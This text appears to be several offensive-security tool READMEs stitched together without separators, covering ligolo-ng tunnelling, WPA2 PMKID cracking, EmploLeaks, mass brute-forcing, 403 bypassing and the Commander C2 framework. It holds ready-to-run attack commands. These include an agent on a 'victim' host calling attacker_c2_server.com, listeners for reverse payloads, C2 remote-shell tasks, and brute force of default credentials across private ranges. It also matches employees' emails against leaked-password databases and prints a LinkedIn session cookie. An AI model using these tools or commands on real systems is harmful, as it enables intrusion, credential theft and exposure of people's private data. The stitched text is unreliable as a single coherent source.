When using Linux, you need to create a tun interface on the Proxy Server (C2):
$ sudo ip tuntap add user [your_username] mode tun ligolo
$ sudo ip link set ligolo up
You need to download the Wintun driver (used by WireGuard) and place wintun.dll in the same folder as Ligolo (make sure you use the right architecture).
Start the proxy server on your Command and Control (C2) server (default port 11601):
$ ./proxy -h # Help options
$ ./proxy -autocert # Automatically request LetsEncrypt certificates
When using the -autocert option, the proxy will automatically request a certificate (using Let's Encrypt) for attacker_c2_server.com when an agent connects.
Port 80 needs to be accessible for Let's Encrypt certificate validation/retrieval
If you want to use your own certificates for the proxy server, you can use the -certfile and -keyfile parameters.
The proxy/relay can automatically generate self-signed TLS certificates using the -selfcert option.
The -ignore-cert option needs to be used with the agent.
Beware of man-in-the-middle attacks! This option should only be used in a test environment or for debugging purposes.
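A hedged illustration of pairing these two flags in a lab setup (hostname and port are the same placeholders used elsewhere in this section):
./proxy -selfcert
./agent -connect attacker_c2_server.com:11601 -ignore-cert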
Start the agent on your target (victim) computer (no privileges are required!):
$ ./agent -connect attacker_c2_server.com:11601
If you want to tunnel the connection over a SOCKS5 proxy, you can use the --socks ip:port option. You can specify SOCKS credentials using the --socks-user and --socks-pass arguments.
A session should appear on the proxy server.
INFO[0102] Agent joined. name=nchatelain@nworkstation remote="XX.XX.XX.XX:38000"
Use the session command to select the agent.
ligolo-ng Β» session
? Specify a session : 1 - nchatelain@nworkstation - XX.XX.XX.XX:38000
Display the network configuration of the agent using the ifconfig command:
[Agent : nchatelain@nworkstation] Β» ifconfig
[...]
┌───────────────────────────────────────────────┐
│ Interface 3                                   │
├──────────────┬────────────────────────────────┤
│ Name         │ wlp3s0                         │
│ Hardware MAC │ de:ad:be:ef:ca:fe              │
│ MTU          │ 1500                           │
│ Flags        │ up|broadcast|multicast         │
│ IPv4 Address │ 192.168.0.30/24                │
└──────────────┴────────────────────────────────┘
Add a route on the proxy/relay server to the 192.168.0.0/24 agent network.
Linux:
$ sudo ip route add 192.168.0.0/24 dev ligolo
Windows:
> netsh int ipv4 show interfaces
Idx     Mét   MTU    État        Nom
--- ---------- ---------- ------------ ---------------------------
25 5 65535 connected ligolo
> route add 192.168.0.0 mask 255.255.255.0 0.0.0.0 if [THE INTERFACE IDX]
Start the tunnel on the proxy:
[Agent : nchatelain@nworkstation] Β» start
[Agent : nchatelain@nworkstation] Β» INFO[0690] Starting tunnel to nchatelain@nworkstation
You can now access the 192.168.0.0/24 agent network from the proxy server.
$ nmap 192.168.0.0/24 -v -sV -n
[...]
$ rdesktop 192.168.0.123
[...]
You can listen to ports on the agent and redirect connections to your control/proxy server.
In a ligolo session, use the listener_add command.
The following example will create a TCP listening socket on the agent (0.0.0.0:1234) and redirect connections to the 4321 port of the proxy server.
[Agent : nchatelain@nworkstation] Β» listener_add --addr 0.0.0.0:1234 --to 127.0.0.1:4321 --tcp
INFO[1208] Listener created on remote agent!
On the proxy:
$ nc -lvp 4321
When a connection is made on TCP port 1234 of the agent, nc will receive the connection.
This is very useful when using reverse tcp/udp payloads.
You can view currently running listeners using the listener_list command and stop them using the listener_stop [ID] command:
[Agent : nchatelain@nworkstation] Β» listener_list
┌───┬─────────────────────────┬────────────────────────┬────────────────────────┐
│                                Active listeners                               │
├───┼─────────────────────────┼────────────────────────┼────────────────────────┤
│ # │ AGENT                   │ AGENT LISTENER ADDRESS │ PROXY REDIRECT ADDRESS │
├───┼─────────────────────────┼────────────────────────┼────────────────────────┤
│ 0 │ nchatelain@nworkstation │ 0.0.0.0:1234           │ 127.0.0.1:4321         │
└───┴─────────────────────────┴────────────────────────┴────────────────────────┘
[Agent : nchatelain@nworkstation] Β» listener_stop 0
INFO[1505] Listener closed.
On the agent side, no! Everything can be performed without administrative access.
However, on your relay/proxy server, you need to be able to create a tun interface.
You can easily hit more than 100 Mbits/sec. Here is a test using iperf from a 200Mbits/s server to a 200Mbits/s connection.
$ iperf3 -c 10.10.0.1 -p 24483
Connecting to host 10.10.0.1, port 24483
[ 5] local 10.10.0.224 port 50654 connected to 10.10.0.1 port 24483
[ ID] Interval Transfer Bitrate Retr Cwnd
[ 5] 0.00-1.00 sec 12.5 MBytes 105 Mbits/sec 0 164 KBytes
[ 5] 1.00-2.00 sec 12.7 MBytes 107 Mbits/sec 0 263 KBytes
[ 5] 2.00-3.00 sec 12.4 MBytes 104 Mbits/sec 0 263 KBytes
[ 5] 3.00-4.00 sec 12.7 MBytes 106 Mbits/sec 0 263 KBytes
[ 5] 4.00-5.00 sec 13.1 MBytes 110 Mbits/sec 2 134 KBytes
[ 5] 5.00-6.00 sec 13.4 MBytes 113 Mbits/sec 0 147 KBytes
[ 5] 6.00-7.00 sec 12.6 MBytes 105 Mbits/sec 0 158 KBytes
[ 5] 7.00-8.00 sec 12.1 MBytes 101 Mbits/sec 0 173 KBytes
[ 5] 8.00-9.00 sec 12.7 MBytes 106 Mbits/sec 0 182 KBytes
[ 5] 9.00-10.00 sec 12.6 MBytes 106 Mbits/sec 0 188 KBytes
- - - - - - - - - - - - - - - - - - - - - - - - -
[ ID] Interval Transfer Bitrate Retr
[ 5] 0.00-10.00 sec 127 MBytes 106 Mbits/sec 2 sender
[ 5] 0.00-10.08 sec 125 MBytes 104 Mbits/sec receiver
Because the agent is running without privileges, it's not possible to forward raw packets. When you perform an Nmap SYN scan, a TCP connect() is performed on the agent.
When using nmap, you should use --unprivileged or -PE to avoid false positives.
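For instance, a scan consistent with this advice (reusing the agent network from the earlier example) might look like:
nmap 192.168.0.0/24 -v -sV -n --unprivileged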
Rayder is a command-line tool designed to simplify the orchestration and execution of workflows. It allows you to define a series of modules in a YAML file, each consisting of commands to be executed. Rayder helps you automate complex processes, making it easy to streamline repetitive modules and execute them parallelly if the commands do not depend on each other.
To install Rayder, ensure you have Go (1.16 or higher) installed on your system. Then, run the following command:
go install github.com/devanshbatham/rayder@v0.0.4
Rayder offers a straightforward way to execute workflows defined in YAML files. Use the following command:
rayder -w path/to/workflow.yaml
A workflow is defined in a YAML file with the following structure:
vars:
VAR_NAME: value
# Add more variables...
parallel: true|false
modules:
- name: task-name
cmds:
- command-1
- command-2
# Add more commands...
silent: true|false
# Add more modules...
Rayder allows you to use variables in your workflow configuration, making it easy to parameterize your commands and achieve more flexibility. You can define variables in the vars section of your workflow YAML file. These variables can then be referenced within your command strings using double curly braces ({{}}).
To define variables, add them to the vars section of your workflow YAML file:
vars:
VAR_NAME: value
ANOTHER_VAR: another_value
# Add more variables...
You can reference variables within your command strings using double curly braces ({{}}). For example, if you defined a variable OUTPUT_DIR, you can use it like this:
modules:
- name: example-task
cmds:
- echo "Output directory {{OUTPUT_DIR}}"
You can also supply values for variables via the command line when executing your workflow. Use the format VARIABLE_NAME=value to provide values for specific variables. For example:
rayder -w path/to/workflow.yaml VAR_NAME=new_value ANOTHER_VAR=updated_value
If you don't provide values for variables via the command line, Rayder will automatically apply the default values defined in the vars section of your workflow YAML file.
Remember that variables supplied via the command line will override the default values defined in the YAML configuration.
Here's an example of how you can define, reference, and supply variables in your workflow configuration:
vars:
ORG: "example.org"
OUTPUT_DIR: "results"
modules:
- name: example-task
cmds:
- echo "Organization {{ORG}}"
- echo "Output directory {{OUTPUT_DIR}}"
When executing the workflow, you can provide values for ORG and OUTPUT_DIR via the command line like this:
rayder -w path/to/workflow.yaml ORG=custom_org OUTPUT_DIR=custom_results_dir
This will override the default values and use the provided values for these variables.
Here's an example workflow configuration tailored for reverse whois recon and processing the root domains into subdomains, resolving them and checking which ones are alive:
vars:
ORG: "Acme, Inc"
OUTPUT_DIR: "results-dir"
parallel: false
modules:
- name: reverse-whois
silent: false
cmds:
- mkdir -p {{OUTPUT_DIR}}
- revwhoix -k "{{ORG}}" > {{OUTPUT_DIR}}/root-domains.txt
- name: finding-subdomains
cmds:
- xargs -I {} -a {{OUTPUT_DIR}}/root-domains.txt echo "subfinder -d {} -o {}.out" | quaithe -workers 30
silent: false
- name: cleaning-subdomains
cmds:
- cat *.out > {{OUTPUT_DIR}}/root-subdomains.txt
- rm *.out
silent: true
- name: resolving-subdomains
cmds:
- cat {{OUTPUT_DIR}}/root-subdomains.txt | dnsx -silent -threads 100 -o {{OUTPUT_DIR}}/resolved-subdomains.txt
silent: false
- name: checking-alive-subdomains
cmds:
- cat {{OUTPUT_DIR}}/resolved-subdomains.txt | httpx -silent -threads 100 -o {{OUTPUT_DIR}}/alive-subdomains.txt
silent: false
To execute the above workflow, run the following command:
rayder -w path/to/reverse-whois.yaml ORG="Yelp, Inc" OUTPUT_DIR=results
The parallel field in the workflow configuration determines whether modules should be executed in parallel or sequentially. Setting parallel to true allows modules to run concurrently, making it suitable for modules with no dependencies. When set to false, modules will execute one after another.
Explore a collection of sample workflows and examples in the Rayder workflows repository. Stay tuned for more additions!
Inspiration of this project comes from Awesome taskfile project.
This program is a tool written in Python to recover the pre-shared key of a WPA2 WiFi network without any de-authentication or requiring any clients to be on the network. It targets the weakness of certain access points advertising the PMKID value in EAPOL message 1.
python pmkidcracker.py -s <SSID> -ap <APMAC> -c <CLIENTMAC> -p <PMKID> -w <WORDLIST> -t <THREADS(Optional)>
NOTE: apmac, clientmac, and pmkid must be hexstrings, e.g. b8621f50edd9
The two main formulas to obtain a PMKID are as follows:
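For reference, the standard WPA2 construction is sketched below in Python; this is my own minimal illustration of the math, not the tool's exact code (the source notes the equivalent logic lives in find_pw_chunk and calculate_pmkid):

import hashlib
import hmac

def pmkid_from_passphrase(passphrase: str, ssid: str, ap_mac: str, client_mac: str) -> bytes:
    # PMK = PBKDF2-HMAC-SHA1(passphrase, SSID, 4096 iterations, 32 bytes)
    pmk = hashlib.pbkdf2_hmac("sha1", passphrase.encode(), ssid.encode(), 4096, 32)
    # PMKID = first 16 bytes of HMAC-SHA1(PMK, "PMK Name" | AP_MAC | STA_MAC)
    data = b"PMK Name" + bytes.fromhex(ap_mac) + bytes.fromhex(client_mac)
    return hmac.new(pmk, data, hashlib.sha1).digest()[:16]

# e.g. pmkid_from_passphrase("password123", "MyWifi", "b8621f50edd9", "aabbccddeeff").hex()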
This is just for understanding; both are already implemented in find_pw_chunk and calculate_pmkid.
Below are the steps to obtain the PMKID manually by inspecting the packets in WireShark.
*You may use Hcxtools or Bettercap to quickly obtain the PMKID without the below steps. The manual way is for understanding.
To obtain the PMKID manually from wireshark, put your wireless antenna in monitor mode, start capturing all packets with airodump-ng or similar tools. Then connect to the AP using an invalid password to capture the EAPOL 1 handshake message. Follow the next 3 steps to obtain the fields needed for the arguments.
Open the pcap in Wireshark and use the filter wlan_rsna_eapol.keydes.msgnr == 1 to display only EAPOL message 1 packets. If the access point is vulnerable, you should see the PMKID value like in the screenshot below:
This tool is for educational and testing purposes only. Do not use it to exploit the vulnerability on any network that you do not own or have permission to test. The authors of this script are not responsible for any misuse or damage caused by its use.
This is a tool designed for Open Source Intelligence (OSINT) purposes, which helps to gather information about employees of a company.
The tool starts by searching through LinkedIn to obtain a list of employees of the company. Then, it looks for their social network profiles to find their personal email addresses. Finally, it uses those email addresses to search through a custom COMB database to retrieve leaked passwords. You can easily add your own database and connect to it through the tool.
To use this tool, you'll need to have Python 3.10 installed on your machine. Clone this repository to your local machine and install the required dependencies using pip in the cli folder:
cd cli
pip install -r requirements.txt
We know that there is a problem when installing the tool due to the psycopg2 binary. If you run into this problem, you can solve it by running:
cd cli
python3 -m pip install psycopg2-binary
To use the tool, simply run the following command:
python3 cli/emploleaks.py
If everything went well during the installation, you will be able to start using EmploLeaks:
___________ .__ .__ __
\_ _____/ _____ ______ | | ____ | | ____ _____ | | __ ______
| __)_ / \____ \| | / _ \| | _/ __ \__ \ | |/ / / ___/
| \ Y Y \ |_> > |_( <_> ) |_\ ___/ / __ \| < \___ \
/_______ /__|_| / __/|____/\____/|____/\___ >____ /__|_ \/____ >
\/ \/|__| \/ \/ \/ \/
OSINT tool to chain multiple apis
emploleaks>
Right now, the tool supports two functionalities:
First, you must set the plugin to use, which in this case is linkedin. Afterwards, you should set your authentication tokens and then run the impersonate process:
emploleaks> use --plugin linkedin
emploleaks(linkedin)> setopt JSESSIONID
JSESSIONID:
[+] Updating value successfull
emploleaks(linkedin)> setopt li-at
li-at:
[+] Updating value successfull
emploleaks(linkedin)> show options
Module options:
Name Current Setting Required Description
---------- ----------------------------------- ---------- -----------------------------------
hide yes no hide the JSESSIONID field
JSESSIONID ************************** no active cookie session in browser #1
li-at AQEDAQ74B0YEUS-_AAABilIFFBsAAAGKdhG no active cookie session in browser #1
YG00AxGP34jz1bRrgAcxkXm9RPNeYIAXz3M
cycrQm5FB6lJ-Tezn8GGAsnl_GRpEANRdPI
lWTRJJGF9vbv5yZHKOeze_WCHoOpe4ylvET
kyCyfN58SNNH
emploleaks(linkedin)> run impersonate
[+] Using cookies from the browser
Setting for first time JSESSIONID
Setting for first time li_at
li_at and JSESSIONID are the authentication cookies of your LinkedIn session in the browser. You can use the Web Developer Tools to get them: just sign in normally at LinkedIn, right-click and choose Inspect, and the cookies will be in the Storage tab.
Now that the module is configured, you can run it and start gathering information from the company:
We created a custom workflow where, with the information retrieved from LinkedIn, we try to match employees' personal emails to potential leaked passwords. In this case, you can connect to a database (in our case, a custom indexed COMB database) using the connect command, as shown below:
emploleaks(linkedin)> connect --user myuser --passwd mypass123 --dbname mydbname --host 1.2.3.4
[+] Connecting to the Leak Database...
[*] version: PostgreSQL 12.15
Once it's connected, you can run the workflow. With all the users gathered, the tool will try to search in the database if a leaked credential is affecting someone:
An important aspect of this project is the use of the indexed COMB database. To build your version, you need to download the torrent first. Be careful, because the files plus the indexed version require at least 400 GB of available disk space.
Once the torrent has been completely downloaded, you will get a folder structure like the following:
├── count_total.sh
├── data
│   ├── 0
│   ├── 1
│   │   ├── 0
│   │   ├── 1
│   │   ├── 2
│   │   ├── 3
│   │   ├── 4
│   │   ├── 5
│   │   ├── 6
│   │   ├── 7
│   │   ├── 8
│   │   ├── 9
│   │   ├── a
│   │   ├── b
│   │   ├── c
│   │   ├── d
│   │   ├── e
│   │   ├── f
│   │   ├── g
│   │   ├── h
│   │   ├── i
│   │   ├── j
│   │   ├── k
│   │   ├── l
│   │   ├── m
│   │   ├── n
│   │   ├── o
│   │   ├── p
│   │   ├── q
│   │   ├── r
│   │   ├── s
│   │   ├── symbols
│   │   ├── t
At this point, you can import all those files with the command create_db:
We are integrating other public sites and applications that may offer information about a leaked credential. We may not be able to see the plaintext password, but it will give an insight into whether the user has any compromised credentials:
Also, we will be focusing on gathering even more information from public sources of every employee. Do you have any idea in mind? Don't hesitate to reach us:
Or you can DM @pastacls or @gaaabifranco on Twitter.
Little AV/EDR Evasion Lab for training & learning purposes. (under construction..)
____ _ _____ ____ ____ ___ __ _____ _
| __ ) ___ ___| |_ | ____| _ \| _ \ / _ \ / _| |_ _| |__ ___
| _ \ / _ \/ __| __| | _| | | | | |_) | | | | | |_ | | | '_ \ / _ \
| |_) | __/\__ \ |_ | |___| |_| | _ < | |_| | _| | | | | | | __/
|____/_\___||___/\__| |_____|____/|_| \_\ \___/|_| |_| |_| |_|\___|
| \/ | __ _ _ __| | _____| |_
| |\/| |/ _` | '__| |/ / _ \ __|
| | | | (_| | | | < __/ |_ Yazidou - github.com/Xacone
|_| |_|\__,_|_| |_|\_\___|\__|
BestEDROfTheMarket is a naive user-mode EDR (Endpoint Detection and Response) project, designed to serve as a testing ground for understanding and bypassing the user-mode detection methods that are frequently used by these security solutions.
These techniques are mainly based on a dynamic analysis of the target process state (memory, API calls, etc.).
Feel free to check this short article I wrote that describes the interception and analysis methods implemented by the EDR.
In progress:
Usage: BestEdrOfTheMarket.exe [args]
/help Shows this help message and quit
/v Verbosity
/iat IAT hooking
/stack Threads call stack monitoring
/nt Inline Nt-level hooking
/k32 Inline Kernel32/Kernelbase hooking
/ssn SSN crushing
BestEdrOfTheMarket.exe /stack /v /k32
BestEdrOfTheMarket.exe /stack /nt
BestEdrOfTheMarket.exe /iat
MacMaster is a versatile command line tool designed to change the MAC address of network interfaces on your system. It provides a simple yet powerful solution for network anonymity and testing.
MacMaster requires Python 3.6 or later.
$ git clone https://github.com/HalilDeniz/MacMaster.git
cd MacMaster
$ python setup.py install
$ macmaster --help
usage: macmaster [-h] [--interface INTERFACE] [--version]
[--random | --newmac NEWMAC | --customoui CUSTOMOUI | --reset]
MacMaster: Mac Address Changer
options:
-h, --help show this help message and exit
--interface INTERFACE, -i INTERFACE
Network interface to change MAC address
--version, -V Show the version of the program
--random, -r Set a random MAC address
--newmac NEWMAC, -nm NEWMAC
Set a specific MAC address
--customoui CUSTOMOUI, -co CUSTOMOUI
Set a custom OUI for the MAC address
--reset, -rs Reset MAC address to the original value
--interface, -i: Specify the network interface.
--random, -r: Set a random MAC address.
--newmac, -nm: Set a specific MAC address.
--customoui, -co: Set a custom OUI for the MAC address.
--reset, -rs: Reset MAC address to the original value.
--version, -V: Show the version of the program.
$ macmaster.py -i eth0 -nm 00:11:22:33:44:55
$ macmaster.py -i eth0 -r
$ macmaster.py -i eth0 -rs
$ macmaster.py -i eth0 -co 08:00:27
$ macmaster.py -V
Replace eth0
with your desired network interface.
You must run this script as root, or with sudo, for it to work properly, because changing a MAC address requires root privileges.
Contributions are welcome! To contribute to MacMaster, follow these steps:
For any inquiries or further information, you can reach me through the following channels:
NetProbe is a tool you can use to scan for devices on your network. The program sends ARP requests to any IP address on your network and lists the IP addresses, MAC addresses, manufacturers, and device models of the responding devices.
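For background, ARP-based discovery of this kind can be sketched in a few lines of Python with scapy; this is an illustrative sketch under assumed interface and subnet values, not NetProbe's actual code:

from scapy.all import ARP, Ether, srp

# Broadcast an ARP "who-has" for every address in the subnet (assumed values)
answered, _ = srp(Ether(dst="ff:ff:ff:ff:ff:ff") / ARP(pdst="192.168.1.0/24"),
                  timeout=2, iface="eth0", verbose=False)

# Each reply carries the responding host's IP and MAC address
for _, reply in answered:
    print(reply.psrc, reply.hwsrc)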
You can download the program from the GitHub page.
$ git clone https://github.com/HalilDeniz/NetProbe.git
To install the required libraries, run the following command:
$ pip install -r requirements.txt
To run the program, use the following command:
$ python3 netprobe.py [-h] -t [...] -i [...] [-l] [-o] [-m] [-r] [-s]
-h, --help: show this help message and exit
-t, --target: Target IP address or subnet (default: 192.168.1.0/24)
-i, --interface: Interface to use (default: None)
-l, --live: Enable live tracking of devices
-o, --output: Output file to save the results
-m, --manufacturer: Filter by manufacturer (e.g., 'Apple')
-r, --ip-range: Filter by IP range (e.g., '192.168.1.0/24')
-s, --scan-rate: Scan rate in seconds (default: 5)
$ python3 netprobe.py -t 192.168.1.0/24 -i eth0 -o results.txt -l
$ python3 netprobe.py --help
usage: netprobe.py [-h] -t [...] -i [...] [-l] [-o] [-m] [-r] [-s]
NetProbe: Network Scanner Tool
options:
-h, --help show this help message and exit
-t [ ...], --target [ ...]
Target IP address or subnet (default: 192.168.1.0/24)
-i [ ...], --interface [ ...]
Interface to use (default: None)
-l, --live Enable live tracking of devices
-o , --output Output file to save the results
-m , --manufacturer Filter by manufacturer (e.g., 'Apple')
-r , --ip-range Filter by IP range (e.g., '192.168.1.0/24')
-s , --scan-rate Scan rate in seconds (default: 5)
$ python3 netprobe.py
You can enable live tracking of devices on your network by using the -l
or --live
flag. This will continuously update the device list every 5 seconds.
$ python3 netprobe.py -t 192.168.1.0/24 -i eth0 -l
You can save the scan results to a file by using the -o
or --output
flag followed by the desired output file name.
$ python3 netprobe.py -t 192.168.1.0/24 -i eth0 -l -o results.txt
┌────────────────┬───────────────────┬─────────────┬──────────────────────────────┐
│ IP Address     │ MAC Address       │ Packet Size │ Manufacturer                 │
├────────────────┼───────────────────┼─────────────┼──────────────────────────────┤
│ 192.168.1.1    │ **:6e:**:97:**:28 │ 102         │ ASUSTek COMPUTER INC.        │
│ 192.168.1.3    │ 00:**:22:**:12:** │ 102         │ InPro Comm                   │
│ 192.168.1.2    │ **:32:**:bf:**:00 │ 102         │ Xiaomi Communications Co Ltd │
│ 192.168.1.98   │ d4:**:64:**:5c:** │ 102         │ ASUSTek COMPUTER INC.        │
│ 192.168.1.25   │ **:49:**:00:**:38 │ 102         │ Unknown                      │
└────────────────┴───────────────────┴─────────────┴──────────────────────────────┘
If you have any questions, suggestions, or feedback about the program, please feel free to reach out to me through any of the following platforms:
This program is released under the MIT LICENSE. See LICENSE for more information.
CloakQuest3r is a powerful Python tool meticulously crafted to uncover the true IP address of websites safeguarded by Cloudflare, a widely adopted web security and performance enhancement service. Its core mission is to accurately discern the actual IP address of web servers that are concealed behind Cloudflare's protective shield. Subdomain scanning is employed as a key technique in this pursuit. This tool is an invaluable resource for penetration testers, security professionals, and web administrators seeking to perform comprehensive security assessments and identify vulnerabilities that may be obscured by Cloudflare's security measures.
Key Features:
Real IP Detection: CloakQuest3r excels in the art of discovering the real IP address of web servers employing Cloudflare's services. This crucial information is paramount for conducting comprehensive penetration tests and ensuring the security of web assets.
Subdomain Scanning: Subdomain scanning is harnessed as a fundamental component in the process of finding the real IP address. It aids in the identification of the actual server responsible for hosting the website and its associated subdomains.
Threaded Scanning: To enhance efficiency and expedite the real IP detection process, CloakQuest3r utilizes threading. This feature enables scanning of a substantial list of subdomains without significantly extending the execution time.
Detailed Reporting: The tool provides comprehensive output, including the total number of subdomains scanned, the total number of subdomains found, and the time taken for the scan. Any real IP addresses unveiled during the process are also presented, facilitating in-depth analysis and penetration testing.
With CloakQuest3r, you can confidently evaluate website security, unveil hidden vulnerabilities, and secure your web assets by disclosing the true IP address concealed behind Cloudflare's protective layers.
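The core idea can be illustrated with a short Python sketch: resolve candidate subdomains directly and compare the answers with the Cloudflare-fronted address. This is a hedged example, not CloakQuest3r's actual code; the domain and the tiny wordlist are assumptions:

import socket

domain = "example.com"                          # assumed target
candidates = ["mail", "ftp", "dev", "cpanel"]   # assumed tiny wordlist

cf_ip = socket.gethostbyname(domain)            # IP served through Cloudflare
print(f"{domain} resolves to {cf_ip} (Cloudflare-fronted)")

for sub in candidates:
    host = f"{sub}.{domain}"
    try:
        ip = socket.gethostbyname(host)
    except socket.gaierror:
        continue
    # A subdomain resolving to a different, non-Cloudflare address may expose the origin server
    if ip != cf_ip:
        print(f"{host} -> {ip} (possible origin)")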
- Still in the development phase; sometimes it can't detect the real IP.
- CloakQuest3r combines multiple indicators to uncover real IP addresses behind Cloudflare. While subdomain scanning is a part of the process, we do not assume that all subdomains' A records point to the target host. The tool is designed to provide valuable insights but may not work in every scenario. We welcome any specific suggestions for improvement.
1. False Negatives: CloakQuest3r may not always accurately identify the real IP address behind Cloudflare, particularly for websites with complex network configurations or strict security measures.
2. Dynamic Environments: Websites' infrastructure and configurations can change over time. The tool may not capture these changes, potentially leading to outdated information.
3. Subdomain Variation: While the tool scans subdomains, it doesn't guarantee that all subdomains' A records will point to the primary host. Some subdomains may also be protected by Cloudflare.
How to Use:
Run CloudScan with a single command-line argument: the target domain you want to analyze.
git clone https://github.com/spyboy-productions/CloakQuest3r.git
cd CloakQuest3r
pip3 install -r requirements.txt
python cloakquest3r.py example.com
The tool will check if the website is using Cloudflare. If not, it will inform you that subdomain scanning is unnecessary.
If Cloudflare is detected, CloudScan will scan for subdomains and identify their real IP addresses.
You will receive detailed output, including the number of subdomains scanned, the total number of subdomains found, and the time taken for the scan.
Any real IP addresses found will be displayed, allowing you to conduct further analysis and penetration testing.
CloudScan simplifies the process of assessing website security by providing a clear, organized, and informative report. Use it to enhance your security assessments, identify potential vulnerabilities, and secure your web assets.
Run it online on replit.com : https://replit.com/@spyb0y/CloakQuest3r
Mass bruteforce network protocols
Simple personal script to quickly mass bruteforce common services in a large scale of network.
It will check for default credentials on ftp, ssh, mysql, mssql...etc.
This was made for authorized red team penetration testing purpose only.
Use masscan (faster than nmap) to find alive hosts with common ports from the network segment.
Parse the masscan result.
Generate and run hydra commands to automatically bruteforce supported network services on devices (see the example command below).
Requirements: Kali Linux or any preferred Linux distribution, and Python 3.10+.
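For reference, a generated hydra command might look roughly like this; a hedged example only, since the actual wordlists and options are chosen by the script:

hydra -L /usr/share/seclists/Usernames/top-usernames-shortlist.txt -P /usr/share/seclists/Passwords/darkweb2017-top100.txt -t 4 ssh://10.0.0.5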
# Clone the repo
git clone https://github.com/opabravo/mass-bruter
cd mass-bruter
# Install required tools for the script
apt update && apt install seclists masscan hydra
Private IP ranges: 10.0.0.0/8, 192.168.0.0/16, 172.16.0.0/12
Save masscan results under ./result/masscan/, with the format masscan_<name>.<ext>
Ex: masscan_192.168.0.0-16.txt
Example command:
masscan -p 3306,1433,21,22,23,445,3389,5900,6379,27017,5432,5984,11211,9200,1521 172.16.0.0/12 | tee ./result/masscan/masscan_test.txt
Example Resume Command:
masscan --resume paused.conf | tee -a ./result/masscan/masscan_test.txt
Command Options
┌──(root㉿root)-[~/mass-bruter]
└─# python3 mass_bruteforce.py
Usage: [OPTIONS]
Mass Bruteforce Script
Options:
-q, --quick Quick mode (Only brute telnet, ssh, ftp , mysql,
mssql, postgres, oracle)
-a, --all Brute all services(Very Slow)
-s, --show Show result with successful login
-f, --file-path PATH The directory or file that contains masscan result
[default: ./result/masscan/]
--help Show this message and exit.
Quick Bruteforce Example:
python3 mass_bruteforce.py -q -f ~/masscan_script.txt
Fetch cracked credentials:
python3 mass_bruteforce.py -s
dpl4hydra
Any contributions are welcomed!
Forbidden Buster is a tool designed to automate various techniques in order to bypass HTTP 401 and 403 response codes and gain access to unauthorized areas in the system. This code is made for security enthusiasts and professionals only. Use it at your own risk.
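As a rough illustration of what such bypass attempts look like (not Forbidden Buster's actual code; the URL and header set are assumptions), one common class of techniques replays the request with alternative headers and verbs and watches for a status change:

import requests

url = "http://example.com/secret"   # assumed protected resource
attempts = [
    {"headers": {"X-Forwarded-For": "127.0.0.1"}},
    {"headers": {"X-Original-URL": "/secret"}},
    {"method": "POST"},
]

for attempt in attempts:
    method = attempt.get("method", "GET")
    resp = requests.request(method, url, headers=attempt.get("headers"), timeout=10)
    # Anything other than 401/403 is worth a closer look
    print(method, attempt.get("headers"), resp.status_code)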
Install requirements
pip3 install -r requirements.txt
Run the script
python3 forbidden_buster.py -u http://example.com
Forbidden Buster accepts the following arguments:
-h, --help show this help message and exit
-u URL, --url URL Full path to be used
-m METHOD, --method METHOD
Method to be used. Default is GET
-H HEADER, --header HEADER
Add a custom header
-d DATA, --data DATA Add data to request body. JSON is supported with escaping
-p PROXY, --proxy PROXY
Use Proxy
--rate-limit RATE_LIMIT
Rate limit (calls per second)
--include-unicode Include Unicode fuzzing (stressful)
--include-user-agent Include User-Agent fuzzing (stressful)
Example Usage:
python3 forbidden_buster.py --url "http://example.com/secret" --method POST --header "Authorization: Bearer XXX" --data '{\"key\":\"value\"}' --proxy "http://proxy.example.com" --rate-limit 5 --include-unicode --include-user-agent
Web Path Finder is a Python program that provides information about a website. It retrieves various details such as page title, last updated date, DNS information, subdomains, firewall names, technologies used, certificate information, and more.
Clone the repository:
git clone https://github.com/HalilDeniz/PathFinder.git
Install the required packages:
pip install -r requirements.txt
This will install all the required modules and their respective versions.
Run the program using the following command:
┌──(root💀denizhalil)-[~/MyProjects/]
└─# python3 web-info-explorer.py --help
usage: wpathFinder.py [-h] url
Web Information Program
positional arguments:
url Enter the site URL
options:
-h, --help show this help message and exit
Replace <url>
with the URL of the website you want to explore.
Here is an example output of running the program:
┌──(root💀denizhalil)-[~/MyProjects/]
└─# python3 pathFinder.py https://www.facebook.com/
Site Information:
Title: Facebook - Login or Register
Last Updated Date: None
First Creation Date: 1997-03-29 05:00:00
Dns Information: []
Sub Branches: ['157']
Firewall Names: []
Technologies Used: javascript, php, css, html, react
Certificate Information:
Certificate Issuer: US
Certificate Start Date: 2023-02-07 00:00:00
Certificate Expiration Date: 2023-05-08 23:59:59
Certificate Validity Period (Days): 90
Bypassed JavaScript content:
</div>
Contributions are welcome! To contribute to PathFinder, follow these steps:
This project is licensed under the MIT License - see the LICENSE file for details.
For any inquiries or further information, you can reach me through the following channels:
Commander is a command and control framework (C2) written in Python, Flask and SQLite. It comes with two agents written in Python and C.
Under Continuous Development
Not script-kiddie friendly
Python >= 3.6 is required to run, plus the following dependencies:
Linux for admin.py and c2_server.py (untested on Windows).
apt install libcurl4-openssl-dev libb64-dev
apt install openssl
pip3 install -r requirements.txt
First create the required certs and keys
# if you want to secure your key with a passphrase exclude the -nodes
openssl req -x509 -newkey rsa:4096 -keyout server.key -out server.crt -days 365 -nodes
Start the admin.py module first in order to create a local sqlite db file
python3 admin.py
Continue by running the server
python3 c2_server.py
And lastly the agent. The Python agent can simply be run, but the C agent needs to be compiled first.
# python agent
python3 agent.py
# C agent
gcc agent.c -o agent -lcurl -lb64
./agent
By default both the agents and the server run over TLS and base64. The communication endpoint is set to 127.0.0.1:5000; if a different endpoint is needed, change it in the agents' source files.
As the Operator/Administrator you can use the following commands to control your agents
Commands:
task add arg c2-commands
Add a task to an agent, to a group or on all agents.
arg: can have the following values: 'all' 'type=Linux|Windows' 'your_uuid'
c2-commands: possible values are c2-register c2-shell c2-sleep c2-quit
c2-register: Triggers the agent to register again.
c2-shell cmd: It takes a shell command for the agent to execute. eg. c2-shell whoami
cmd: The command to execute.
c2-sleep: Configure the interval that an agent will check for tasks.
c2-session port: Instructs the agent to open a shell session with the server to this port.
port: The port to connect to. If it is not provided it defaults to 5555.
c2-quit: Forces an agent to quit.
task delete arg
Delete a task from an agent or all agents.
arg: can have the following values: 'all' 'type=Linux|Windows' 'your_uuid'
show agent arg
Displays info for all the available agents or for a specific agent.
arg: can have the following values: 'all' 'type=Linux|Windows' 'your_uuid'
show task arg
Displays the task of an agent or all agents.
arg: can have the following values: 'all' 'type=Linux|Windows' 'your_uuid'
show result arg
Displays the history/result of an agent or all agents.
arg: can have the following values: 'all' 'type=Linux|Windows' 'your_uuid'
find active agents
